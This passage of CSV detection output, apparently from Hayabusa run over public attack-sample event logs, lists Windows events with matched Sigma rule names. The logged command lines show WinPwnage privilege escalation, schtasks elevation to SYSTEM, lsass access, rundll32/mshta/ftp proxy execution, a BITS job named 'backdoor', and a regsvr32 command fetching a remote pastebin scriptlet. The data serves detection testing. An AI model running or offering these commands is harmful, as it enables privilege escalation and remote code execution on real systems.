365ABB72-0D5E-5CD7-0000-001047331700",../hayabusa-rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Persistence/sysmon_20_21_1_CommandLineEventConsumer.evtx 2019-05-12 03:10:42.434 +09:00,IEWIN7,1,info,,Process Created,"Cmd: python winpwnage.py -u elevate -i 1 -p c:\Windows\System32\cmd.exe | Process: C:\Python27\python.exe | User: IEWIN7\IEUser | Parent Cmd: ""C:\Windows\System32\cmd.exe"" | LID: 0x14591 | PID: 744 | PGUID: 365ABB72-1022-5CD7-0000-00105D081C00",../hayabusa-rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege Escalation/sysmon_privesc_from_admin_to_system_handle_inheritance.evtx 2019-05-12 03:10:42.637 +09:00,IEWIN7,10,low,,Process Access,Src Process: c:\python27\python.exe | Tgt Process: C:\Windows\system32\lsass.exe | Src User: %SourceUser% | Tgt User: %TargetUser% | Access: 0x101ffb | Src PID: 744 | Src PGUID: 365ABB72-1022-5CD7-0000-00105D081C00 | Tgt PID: 492 | Tgt PGUID: 365ABB72-8693-5CD7-0000-0010765E0000,../hayabusa-rules/hayabusa/sysmon/events/10_ProcessAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege Escalation/sysmon_privesc_from_admin_to_system_handle_inheritance.evtx 2019-05-12 03:10:42.668 +09:00,IEWIN7,1,info,,Process Created,Cmd: c:\Windows\System32\cmd.exe | Process: C:\Windows\System32\cmd.exe | User: NT AUTHORITY\SYSTEM | Parent Cmd: C:\Windows\system32\lsass.exe | LID: 0x3e7 | PID: 3248 | PGUID: 365ABB72-1022-5CD7-0000-0010DF121C00,../hayabusa-rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege Escalation/sysmon_privesc_from_admin_to_system_handle_inheritance.evtx 2019-05-12 03:10:42.668 +09:00,IEWIN7,1,high,PrivEsc,Abused Debug Privilege by Arbitrary Parent Processes,,../hayabusa-rules/sigma/process_creation/proc_creation_win_abusing_debug_privilege.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege Escalation/sysmon_privesc_from_admin_to_system_handle_inheritance.evtx 2019-05-12 09:32:24.461 +09:00,IEWIN7,1,info,,Process Created,"Cmd: python winpwnage.py -u elevate -i 4 -p c:\Windows\System32\cmd.exe | Process: C:\Python27\python.exe | User: IEWIN7\IEUser | Parent Cmd: ""C:\Windows\System32\cmd.exe"" | LID: 0x1384a | PID: 2740 | PGUID: 365ABB72-6998-5CD7-0000-00104E422200",../hayabusa-rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege Escalation/sysmon_1_11_exec_as_system_via_schedtask.evtx 2019-05-12 09:32:30.211 +09:00,IEWIN7,1,info,,Process Created,"Cmd: ""C:\Windows\System32\schtasks.exe"" /create /xml c:\users\ieuser\appdata\local\temp\elevator.xml /tn elevator | Process: C:\Windows\System32\schtasks.exe | User: IEWIN7\IEUser | Parent Cmd: python winpwnage.py -u elevate -i 4 -p c:\Windows\System32\cmd.exe | LID: 0x1384a | PID: 3876 | PGUID: 365ABB72-699E-5CD7-0000-001073582200",../hayabusa-rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege Escalation/sysmon_1_11_exec_as_system_via_schedtask.evtx 2019-05-12 09:32:30.211 +09:00,IEWIN7,1,high,Exec,Suspicious Add Scheduled Task From User AppData Temp,,../hayabusa-rules/sigma/process_creation/proc_creation_win_susp_schtasks_user_temp.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege Escalation/sysmon_1_11_exec_as_system_via_schedtask.evtx 2019-05-12 09:32:30.211 +09:00,IEWIN7,1,high,Exec,Suspicius Schtasks From Env Var Folder,,../hayabusa-rules/sigma/process_creation/win_pc_susp_schtasks_env_folder.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege Escalation/sysmon_1_11_exec_as_system_via_schedtask.evtx 2019-05-12 09:32:30.211 +09:00,IEWIN7,1,high,Exec,Suspicious Add Scheduled Command Pattern,,../hayabusa-rules/sigma/process_creation/proc_creation_win_susp_schtasks_pattern.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege Escalation/sysmon_1_11_exec_as_system_via_schedtask.evtx 2019-05-12 09:32:30.211 +09:00,IEWIN7,1,low,Exec | Persis | PrivEsc,Scheduled Task Creation,,../hayabusa-rules/sigma/process_creation/proc_creation_win_susp_schtask_creation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege Escalation/sysmon_1_11_exec_as_system_via_schedtask.evtx 2019-05-12 09:32:30.227 +09:00,IEWIN7,11,info,,File Created,Path: C:\Windows\System32\Tasks\elevator | Process: C:\Windows\system32\svchost.exe | PID: 972 | PGUID: 365ABB72-5DEA-5CD7-0000-001077D20000,../hayabusa-rules/hayabusa/sysmon/events/11_FileCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege Escalation/sysmon_1_11_exec_as_system_via_schedtask.evtx 2019-05-12 09:32:35.258 +09:00,IEWIN7,1,info,,Process Created,"Cmd: ""C:\Windows\System32\schtasks.exe"" /run /tn elevator | Process: C:\Windows\System32\schtasks.exe | User: IEWIN7\IEUser | Parent Cmd: python winpwnage.py -u elevate -i 4 -p c:\Windows\System32\cmd.exe | LID: 0x1384a | PID: 3752 | PGUID: 365ABB72-69A3-5CD7-0000-0010306F2200",../hayabusa-rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege Escalation/sysmon_1_11_exec_as_system_via_schedtask.evtx 2019-05-12 09:32:35.352 +09:00,IEWIN7,1,info,,Process Created,Cmd: c:\Windows\System32\cmd.exe | Process: C:\Windows\System32\cmd.exe | User: NT AUTHORITY\SYSTEM | Parent Cmd: taskeng.exe {9C7BC894-6658-423B-9B58-61636DBB1451} S-1-5-18:NT AUTHORITY\System:Service: | LID: 0x3e7 | PID: 1860 | PGUID: 365ABB72-69A3-5CD7-0000-00109D7F2200,../hayabusa-rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege Escalation/sysmon_1_11_exec_as_system_via_schedtask.evtx 2019-05-12 09:32:40.342 +09:00,IEWIN7,1,info,,Process Created,"Cmd: ""C:\Windows\System32\schtasks.exe"" /delete /tn elevator | Process: C:\Windows\System32\schtasks.exe | User: IEWIN7\IEUser | Parent Cmd: python winpwnage.py -u elevate -i 4 -p c:\Windows\System32\cmd.exe | LID: 0x1384a | PID: 3792 | PGUID: 365ABB72-69A8-5CD7-0000-0010C0982200",../hayabusa-rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege Escalation/sysmon_1_11_exec_as_system_via_schedtask.evtx 2019-05-12 21:52:43.702 +09:00,IEWIN7,7045,info,Persis,Service Installed,Name: WinPwnage | Path: %COMSPEC% /c ping -n 1 127.0.0.1 >nul && echo 'WinPwnage' > \\.\pipe\WinPwnagePipe | Account: LocalSystem | Start Type: demand start,../hayabusa-rules/hayabusa/default/events/System/7045_ServiceInstalled.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege Escalation/System_7045_namedpipe_privesc.evtx 2019-05-12 22:30:32.931 +09:00,IEWIN7,1,info,,Process Created,"Cmd: python winpwnage.py -u execute -i 9 -p c:\Windows\system32\cmd.exe | Process: C:\Python27\python.exe | User: IEWIN7\IEUser | Parent Cmd: ""C:\Windows\System32\cmd.exe"" | LID: 0x13a10 | PID: 1332 | PGUID: 365ABB72-1FF8-5CD8-0000-00102A342000",../hayabusa-rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Execution/exec_sysmon_1_11_lolbin_rundll32_openurl_FileProtocolHandler.evtx 2019-05-12 22:30:46.181 +09:00,IEWIN7,11,info,,File Created,Path: C:\Users\IEUser\AppData\Local\Temp\ieframe.url | Process: c:\python27\python.exe | PID: 1332 | PGUID: 365ABB72-1FF8-5CD8-0000-00102A342000,../hayabusa-rules/hayabusa/sysmon/events/11_FileCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Execution/exec_sysmon_1_11_lolbin_rundll32_openurl_FileProtocolHandler.evtx 2019-05-12 22:30:46.400 +09:00,IEWIN7,1,info,,Process Created,"Cmd: ""C:\Windows\System32\rundll32.exe"" ieframe.dll,OpenURL c:\users\ieuser\appdata\local\temp\ieframe.url | Process: C:\Windows\System32\rundll32.exe | User: IEWIN7\IEUser | Parent Cmd: python winpwnage.py -u execute -i 9 -p c:\Windows\system32\cmd.exe | LID: 0x13a10 | PID: 2960 | PGUID: 365ABB72-2006-5CD8-0000-0010A2862300",../hayabusa-rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Execution/exec_sysmon_1_11_lolbin_rundll32_openurl_FileProtocolHandler.evtx 2019-05-12 22:30:46.400 +09:00,IEWIN7,1,medium,Evas,Suspicious Rundll32 Activity,,../hayabusa-rules/sigma/process_creation/proc_creation_win_susp_rundll32_activity.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Execution/exec_sysmon_1_11_lolbin_rundll32_openurl_FileProtocolHandler.evtx 2019-05-12 22:30:46.556 +09:00,IEWIN7,1,info,,Process Created,"Cmd: ""C:\Windows\system32\cmd.exe"" | Process: C:\Windows\System32\cmd.exe | User: IEWIN7\IEUser | Parent Cmd: ""C:\Windows\System32\rundll32.exe"" ieframe.dll,OpenURL c:\users\ieuser\appdata\local\temp\ieframe.url | LID: 0x13a10 | PID: 2936 | PGUID: 365ABB72-2006-5CD8-0000-0010E0912300",../hayabusa-rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Execution/exec_sysmon_1_11_lolbin_rundll32_openurl_FileProtocolHandler.evtx 2019-05-12 22:32:58.167 +09:00,IEWIN7,1,info,,Process Created,"Cmd: rundll32.exe url.dll,OpenURL file://C:/Windows/system32/calc.exe | Process: C:\Windows\System32\rundll32.exe | User: IEWIN7\IEUser | Parent Cmd: ""C:\Windows\system32\cmd.exe"" | LID: 0x13a10 | PID: 3560 | PGUID: 365ABB72-208A-5CD8-0000-0010119B2400",../hayabusa-rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Execution/exec_sysmon_1_11_lolbin_rundll32_openurl_FileProtocolHandler.evtx 2019-05-12 22:32:58.167 +09:00,IEWIN7,1,medium,Evas,Suspicious Rundll32 Activity,,../hayabusa-rules/sigma/process_creation/proc_creation_win_susp_rundll32_activity.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Execution/exec_sysmon_1_11_lolbin_rundll32_openurl_FileProtocolHandler.evtx 2019-05-12 22:33:37.078 +09:00,IEWIN7,1,info,,Process Created,"Cmd: rundll32.exe url.dll,FileProtocolHandler calc.exe | Process: C:\Windows\System32\rundll32.exe | User: IEWIN7\IEUser | Parent Cmd: ""C:\Windows\system32\cmd.exe"" | LID: 0x13a10 | PID: 1844 | PGUID: 365ABB72-20B1-5CD8-0000-001064D62400",../hayabusa-rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Execution/exec_sysmon_1_11_lolbin_rundll32_openurl_FileProtocolHandler.evtx 2019-05-12 22:33:37.078 +09:00,IEWIN7,1,medium,Evas,Suspicious Rundll32 Activity,,../hayabusa-rules/sigma/process_creation/proc_creation_win_susp_rundll32_activity.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Execution/exec_sysmon_1_11_lolbin_rundll32_openurl_FileProtocolHandler.evtx 2019-05-12 22:33:59.743 +09:00,IEWIN7,1,info,,Process Created,"Cmd: rundll32.exe url.dll,FileProtocolHandler file://C:/Windows/system32/calc.exe | Process: C:\Windows\System32\rundll32.exe | User: IEWIN7\IEUser | Parent Cmd: ""C:\Windows\system32\cmd.exe"" | LID: 0x13a10 | PID: 1416 | PGUID: 365ABB72-20C7-5CD8-0000-001021022500",../hayabusa-rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Execution/exec_sysmon_1_11_lolbin_rundll32_openurl_FileProtocolHandler.evtx 2019-05-12 22:33:59.743 +09:00,IEWIN7,1,medium,Evas,Suspicious Rundll32 Activity,,../hayabusa-rules/sigma/process_creation/proc_creation_win_susp_rundll32_activity.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Execution/exec_sysmon_1_11_lolbin_rundll32_openurl_FileProtocolHandler.evtx 2019-05-12 22:37:49.604 +09:00,IEWIN7,11,info,,File Created,Path: C:\ProgramData\calc.hta | Process: C:\Windows\Explorer.EXE | PID: 2940 | PGUID: 365ABB72-15B9-5CD8-0000-00103CEB0600,../hayabusa-rules/hayabusa/sysmon/events/11_FileCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Execution/exec_sysmon_1_11_lolbin_rundll32_openurl_FileProtocolHandler.evtx 2019-05-12 22:38:00.523 +09:00,IEWIN7,1,info,,Process Created,"Cmd: rundll32.exe url.dll,FileProtocolHandler file:///C:/programdata/calc.hta | Process: C:\Windows\System32\rundll32.exe | User: IEWIN7\IEUser | Parent Cmd: ""C:\Windows\system32\cmd.exe"" | LID: 0x13a10 | PID: 3856 | PGUID: 365ABB72-21B8-5CD8-0000-0010BADE2600",../hayabusa-rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Execution/exec_sysmon_1_11_lolbin_rundll32_openurl_FileProtocolHandler.evtx 2019-05-12 22:38:00.523 +09:00,IEWIN7,1,medium,Evas,Suspicious Rundll32 Activity,,../hayabusa-rules/sigma/process_creation/proc_creation_win_susp_rundll32_activity.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Execution/exec_sysmon_1_11_lolbin_rundll32_openurl_FileProtocolHandler.evtx 2019-05-12 22:38:00.712 +09:00,IEWIN7,1,info,,Process Created,"Cmd: ""C:\Windows\System32\mshta.exe"" ""C:\programdata\calc.hta"" | Process: C:\Windows\System32\mshta.exe | User: IEWIN7\IEUser | Parent Cmd: rundll32.exe url.dll,FileProtocolHandler file:///C:/programdata/calc.hta | LID: 0x13a10 | PID: 2964 | PGUID: 365ABB72-21B8-5CD8-0000-0010E4E82600",../hayabusa-rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Execution/exec_sysmon_1_11_lolbin_rundll32_openurl_FileProtocolHandler.evtx 2019-05-12 22:38:00.712 +09:00,IEWIN7,1,high,Evas | Exec,MSHTA Suspicious Execution 01,,../hayabusa-rules/sigma/process_creation/proc_creation_win_susp_mshta_execution.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Execution/exec_sysmon_1_11_lolbin_rundll32_openurl_FileProtocolHandler.evtx 2019-05-12 22:38:00.712 +09:00,IEWIN7,1,high,Exec,Suspicious MSHTA Process Patterns,,../hayabusa-rules/sigma/process_creation/proc_creation_win_susp_mshta_pattern.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Execution/exec_sysmon_1_11_lolbin_rundll32_openurl_FileProtocolHandler.evtx 2019-05-12 22:38:00.712 +09:00,IEWIN7,1,high,Exec | Evas,Windows Shell Spawning Suspicious Program,,../hayabusa-rules/sigma/process_creation/proc_creation_win_shell_spawn_susp_program.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Execution/exec_sysmon_1_11_lolbin_rundll32_openurl_FileProtocolHandler.evtx 2019-05-12 22:38:01.383 +09:00,IEWIN7,1,info,,Process Created,"Cmd: ""C:\Windows\System32\calc.exe"" | Process: C:\Windows\System32\calc.exe | User: IEWIN7\IEUser | Parent Cmd: ""C:\Windows\System32\mshta.exe"" ""C:\programdata\calc.hta"" | LID: 0x13a10 | PID: 704 | PGUID: 365ABB72-21B9-5CD8-0000-0010FC002700",../hayabusa-rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Execution/exec_sysmon_1_11_lolbin_rundll32_openurl_FileProtocolHandler.evtx 2019-05-12 22:55:56.626 +09:00,IEWIN7,1,info,,Process Created,"Cmd: python winpwnage.py -u execute -i 12 -p c:\Windows\System32\calc.exe | Process: C:\Python27\python.exe | User: IEWIN7\IEUser | Parent Cmd: ""C:\Windows\system32\cmd.exe"" | LID: 0x1364c | PID: 684 | PGUID: 365ABB72-25EC-5CD8-0000-0010CB0A1000",../hayabusa-rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Execution/exec_sysmon_1_11_lolbin_rundll32_shdocvw_openurl.evtx 2019-05-12 22:56:12.329 +09:00,IEWIN7,11,info,,File Created,Path: C:\Users\IEUser\AppData\Local\Temp\shdocvw.url | Process: c:\python27\python.exe | PID: 684 | PGUID: 365ABB72-25EC-5CD8-0000-0010CB0A1000,../hayabusa-rules/hayabusa/sysmon/events/11_FileCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Execution/exec_sysmon_1_11_lolbin_rundll32_shdocvw_openurl.evtx 2019-05-12 22:56:12.652 +09:00,IEWIN7,1,info,,Process Created,"Cmd: ""C:\Windows\System32\rundll32.exe"" shdocvw.dll,OpenURL c:\users\ieuser\appdata\local\temp\shdocvw.url | Process: C:\Windows\System32\rundll32.exe | User: IEWIN7\IEUser | Parent Cmd: python winpwnage.py -u execute -i 12 -p c:\Windows\System32\calc.exe | LID: 0x1364c | PID: 2168 | PGUID: 365ABB72-25FC-5CD8-0000-0010906A1300",../hayabusa-rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Execution/exec_sysmon_1_11_lolbin_rundll32_shdocvw_openurl.evtx 2019-05-12 22:56:12.652 +09:00,IEWIN7,1,medium,Evas,Suspicious Rundll32 Activity,,../hayabusa-rules/sigma/process_creation/proc_creation_win_susp_rundll32_activity.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Execution/exec_sysmon_1_11_lolbin_rundll32_shdocvw_openurl.evtx 2019-05-12 22:56:46.573 +09:00,IEWIN7,11,info,,File Created,Path: C:\Windows\inf\WmiApRpl\0009\WmiApRpl.ini | Process: \\?\C:\Windows\system32\wbem\WMIADAP.EXE | PID: 1512 | PGUID: 365ABB72-2615-5CD8-0000-001075171500,../hayabusa-rules/hayabusa/sysmon/events/11_FileCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Execution/exec_sysmon_1_11_lolbin_rundll32_shdocvw_openurl.evtx 2019-05-12 22:56:46.605 +09:00,IEWIN7,11,info,,File Created,Path: C:\Windows\System32\PerfStringBackup.INI | Process: \\?\C:\Windows\system32\wbem\WMIADAP.EXE | PID: 1512 | PGUID: 365ABB72-2615-5CD8-0000-001075171500,../hayabusa-rules/hayabusa/sysmon/events/11_FileCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Execution/exec_sysmon_1_11_lolbin_rundll32_shdocvw_openurl.evtx 2019-05-12 22:57:39.662 +09:00,IEWIN7,11,info,,File Created,Path: C:\Windows\System32\Tasks\Microsoft\Windows Defender\MpIdleTask | Process: C:\Windows\system32\svchost.exe | PID: 968 | PGUID: 365ABB72-2522-5CD8-0000-001080D10000,../hayabusa-rules/hayabusa/sysmon/events/11_FileCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Execution/exec_sysmon_1_11_lolbin_rundll32_shdocvw_openurl.evtx 2019-05-12 22:58:39.850 +09:00,IEWIN7,1,info,,Process Created,"Cmd: python winpwnage.py -u execute -i 14 -p c:\Windows\System32\calc.exe | Process: C:\Python27\python.exe | User: IEWIN7\IEUser | Parent Cmd: ""C:\Windows\system32\cmd.exe"" | LID: 0x1364c | PID: 1256 | PGUID: 365ABB72-268F-5CD8-0000-0010F4A51700",../hayabusa-rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Execution/exec_sysmon_1_11_lolbin_rundll32_zipfldr_RouteTheCall.evtx 2019-05-12 22:58:54.897 +09:00,IEWIN7,1,info,,Process Created,"Cmd: ""C:\Windows\System32\rundll32.exe"" zipfldr.dll,RouteTheCall c:\Windows\System32\calc.exe | Process: C:\Windows\System32\rundll32.exe | User: IEWIN7\IEUser | Parent Cmd: python winpwnage.py -u execute -i 14 -p c:\Windows\System32\calc.exe | LID: 0x1364c | PID: 2728 | PGUID: 365ABB72-269E-5CD8-0000-001084F81A00",../hayabusa-rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Execution/exec_sysmon_1_11_lolbin_rundll32_zipfldr_RouteTheCall.evtx 2019-05-12 22:58:54.897 +09:00,IEWIN7,1,medium,Evas,Suspicious Rundll32 Activity,,../hayabusa-rules/sigma/process_creation/proc_creation_win_susp_rundll32_activity.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Execution/exec_sysmon_1_11_lolbin_rundll32_zipfldr_RouteTheCall.evtx 2019-05-12 23:18:03.589 +09:00,IEWIN7,1,info,,Process Created,"Cmd: ""C:\Windows\system32\cmd.exe"" | Process: C:\Windows\System32\cmd.exe | User: IEWIN7\IEUser | Parent Cmd: C:\Windows\Explorer.EXE | LID: 0x1364c | PID: 3320 | PGUID: 365ABB72-2B1B-5CD8-0000-0010CCC92500",../hayabusa-rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Execution/exec_sysmon_1_lolbin_rundll32_advpack_RegisterOCX.evtx 2019-05-12 23:18:09.589 +09:00,IEWIN7,1,info,,Process Created,"Cmd: ""C:\Windows\System32\rundll32.exe"" advpack.dll,RegisterOCX c:\Windows\System32\calc.exe | Process: C:\Windows\System32\rundll32.exe | User: IEWIN7\IEUser | Parent Cmd: ""C:\Windows\system32\cmd.exe"" | LID: 0x1364c | PID: 816 | PGUID: 365ABB72-2B21-5CD8-0000-001039DD2500",../hayabusa-rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Execution/exec_sysmon_1_lolbin_rundll32_advpack_RegisterOCX.evtx 2019-05-12 23:18:09.589 +09:00,IEWIN7,1,medium,Evas,Suspicious Rundll32 Activity,,../hayabusa-rules/sigma/process_creation/proc_creation_win_susp_rundll32_activity.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Execution/exec_sysmon_1_lolbin_rundll32_advpack_RegisterOCX.evtx 2019-05-13 02:01:43.391 +09:00,IEWIN7,1,info,,Process Created,"Cmd: ""C:\Windows\system32\cmd.exe"" | Process: C:\Windows\System32\cmd.exe | User: IEWIN7\IEUser | Parent Cmd: C:\Windows\Explorer.EXE | LID: 0x135f2 | PID: 3788 | PGUID: 365ABB72-516B-5CD8-0000-001087E41600",../hayabusa-rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Execution/exec_sysmon_1_lolbin_pcalua.evtx 2019-05-13 02:01:50.781 +09:00,IEWIN7,1,info,,Process Created,"Cmd: ""C:\Windows\System32\pcalua.exe"" -a c:\Windows\system32\calc.exe | Process: C:\Windows\System32\pcalua.exe | User: IEWIN7\IEUser | Parent Cmd: ""C:\Windows\system32\cmd.exe"" | LID: 0x135f2 | PID: 2952 | PGUID: 365ABB72-517E-5CD8-0000-001024D61700",../hayabusa-rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Execution/exec_sysmon_1_lolbin_pcalua.evtx 2019-05-13 02:01:51.007 +09:00,IEWIN7,1,info,,Process Created,"Cmd: ""C:\Windows\system32\calc.exe"" | Process: C:\Windows\System32\calc.exe | User: IEWIN7\IEUser | Parent Cmd: ""C:\Windows\System32\pcalua.exe"" -a c:\Windows\system32\calc.exe | LID: 0x135f2 | PID: 2920 | PGUID: 365ABB72-517E-5CD8-0000-00105FE01700",../hayabusa-rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Execution/exec_sysmon_1_lolbin_pcalua.evtx 2019-05-13 02:01:51.007 +09:00,IEWIN7,1,low,Evas,Indirect Command Execution,,../hayabusa-rules/sigma/process_creation/proc_creation_win_indirect_cmd.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Execution/exec_sysmon_1_lolbin_pcalua.evtx 2019-05-13 02:09:02.275 +09:00,IEWIN7,1,info,,Process Created,"Cmd: ""C:\Windows\System32\rundll32.exe"" pcwutl.dll,LaunchApplication c:\Windows\system32\calc.exe | Process: C:\Windows\System32\rundll32.exe | User: IEWIN7\IEUser | Parent Cmd: ""C:\Windows\system32\cmd.exe"" | LID: 0x135f2 | PID: 1528 | PGUID: 365ABB72-532E-5CD8-0000-00106C222700",../hayabusa-rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Execution/exec_sysmon_1_rundll32_pcwutl_LaunchApplication.evtx 2019-05-13 02:09:02.275 +09:00,IEWIN7,1,medium,Evas,Suspicious Rundll32 Activity,,../hayabusa-rules/sigma/process_creation/proc_creation_win_susp_rundll32_activity.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Execution/exec_sysmon_1_rundll32_pcwutl_LaunchApplication.evtx 2019-05-13 02:09:02.275 +09:00,IEWIN7,1,medium,Evas,Code Execution via Pcwutl.dll,,../hayabusa-rules/sigma/process_creation/proc_creation_win_susp_pcwutl.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Execution/exec_sysmon_1_rundll32_pcwutl_LaunchApplication.evtx 2019-05-13 02:20:01.980 +09:00,IEWIN7,1,info,,Process Created,"Cmd: ""C:\Windows\system32\cmd.exe"" | Process: C:\Windows\System32\cmd.exe | User: IEWIN7\IEUser | Parent Cmd: C:\Windows\Explorer.EXE | LID: 0x135f2 | PID: 4092 | PGUID: 365ABB72-55C1-5CD8-0000-0010970D2F00",../hayabusa-rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Execution/exec_sysmon_1_ftp.evtx 2019-05-13 02:20:31.183 +09:00,IEWIN7,1,info,,Process Created,"Cmd: python winpwnage.py -u execute -i 11 -p c:\Windows\system32\calc.exe | Process: C:\Python27\python.exe | User: IEWIN7\IEUser | Parent Cmd: ""C:\Windows\system32\cmd.exe"" | LID: 0x135f2 | PID: 956 | PGUID: 365ABB72-55DF-5CD8-0000-001018532F00",../hayabusa-rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Execution/exec_sysmon_1_ftp.evtx 2019-05-13 02:20:49.443 +09:00,IEWIN7,1,info,,Process Created,"Cmd: C:\Windows\system32\cmd.exe /C c:\Windows\system32\calc.exe | Process: C:\Windows\System32\cmd.exe | User: IEWIN7\IEUser | Parent Cmd: ""C:\Windows\System32\ftp.exe"" -s:c:\users\ieuser\appdata\local\temp\ftp.txt | LID: 0x135f2 | PID: 2392 | PGUID: 365ABB72-55F1-5CD8-0000-0010781C3300",../hayabusa-rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Execution/exec_sysmon_1_ftp.evtx 2019-05-13 02:20:49.443 +09:00,IEWIN7,1,medium,Exec | Evas,Suspicious ftp.exe,,../hayabusa-rules/sigma/process_creation/proc_creation_win_susp_ftp.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Execution/exec_sysmon_1_ftp.evtx 2019-05-13 02:20:49.458 +09:00,IEWIN7,1,info,,Process Created,Cmd: c:\Windows\system32\calc.exe | Process: C:\Windows\System32\calc.exe | User: IEWIN7\IEUser | Parent Cmd: C:\Windows\system32\cmd.exe /C c:\Windows\system32\calc.exe | LID: 0x135f2 | PID: 684 | PGUID: 365ABB72-55F1-5CD8-0000-00103D1E3300,../hayabusa-rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Execution/exec_sysmon_1_ftp.evtx 2019-05-13 03:04:50.121 +09:00,IEWIN7,59,info,Evas | Persis,Bits Job Created,Job Title: backdoor | URL: C:\Windows\system32\cmd.exe,../hayabusa-rules/hayabusa/default/events/BitsClient_Operational/59_BitsJobCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Persistence/persist_bitsadmin_Microsoft-Windows-Bits-Client-Operational.evtx 2019-05-13 03:35:05.155 +09:00,IEWIN7,1,info,,Process Created,"Cmd: regsvr32.exe /u /s /i:http://pastebin.com/raw/H4A4iDTA scrobj.dll | Process: C:\Windows\System32\regsvr32.exe | User: IEWIN7\IEUser | Parent Cmd: ""C:\Windows\system32\cmd.exe"" | 